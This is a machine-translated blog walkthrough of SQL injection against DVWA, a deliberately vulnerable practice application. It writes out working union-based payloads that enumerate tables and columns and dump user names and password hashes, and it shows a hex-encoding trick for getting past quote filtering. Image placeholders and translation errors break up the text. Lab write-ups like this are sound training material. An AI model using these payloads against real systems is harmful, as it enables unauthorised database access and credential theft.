SQL injection of DVWA (1)

Others 2021-01-29 04:53:52 views: null

SQL injection of DVWA (1)

1. Low-level

1. Enter the ID to get an echo:

Insert picture description here

2. Judge the injection method:

enter1’ and ‘1’ = ‘1’ #Success echo:
Insert picture description hereenter1’ and ‘1’ = ‘2’ #Echo failed:
it is judged as single quote character injection.

3. Determine the number of columns and the data echo position

use order by The statement determines the number of columns.

use 1’ order by 3 #An error occurred:
Insert picture description here
use1’ order by 2 # Successfully echoed, indicating that the number of columns is 2:
Insert picture description here

4. Use union joint injection query, you can echo the position and get the current library

use -1’ union select 1 , 2 #Judging the echo position: It
Insert picture description herecan be echoed in two places.

Use the database() function to get the current database:
Insert picture description here

5. Get the table name

use -1’ union select 1 , group_concat(table_name) from information_schema.tables where table_schema = ‘dvwa’ #
Get the table name:

Insert picture description here

6. Get the field name

use -1’ union select 1 , group_concat(column_name) from information_schema.columns where table_name = ‘users’ #
Get the field name:
Insert picture description here

7. Obtain key information (user name, password)

use -1’ union select user , password from users #
Get username and password:
Insert picture description here

Source code key statement:

Insert picture description here

2. Intermediate level

It is found that the ID is a drop-down list without an input box: you
Insert picture description herecan use burpsuite to capture packets for injection.
Insert picture description here

Judging that the injection method and library name are the same as before, it is found to beDigitalInjection, the library name is 'voice'

Judgment table name

When judging the table name, use -1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema = ‘dvwa’ # An error occurred during the statement:
Insert picture description here

Check the source code and find that special characters are filtered out:
Insert picture description hereSo optimize the sql statement:

-1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema = database() #
Or convert the library name dvwa to hex code: 0x64767761 to bypass:
Insert picture description here

Judge field name

In the same way, hex code 0x7573657273 for the table name users
Insert picture description here

3. High level

Insert picture description hereAnother page appears to prevent automatic tool injection.

The judgment steps are the same as before, and it is judged to be a single quote character injection.

Refer to low-level injection.

Guess you like

Origin blog.csdn.net/qq_45742511/article/details/112960778
Recommended
Arc Browser for Windows 1.0 officially GA
A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!
Ranking
1. Select Sort
Create a thread thread
3 press to play ball that reach 6
Programmation CUDA (4) : gestion de la mémoire
SpringBoot database connection pool Druid error
E Diudiu App redesign summary
4EVERLAND Hosting now supports SNS+IPFS
About HTTPS
[vue3+vite+ts+element-plu+sass] uses bug records in sass
Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling
Daily
More
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)

Code World

© 2018 codetd.com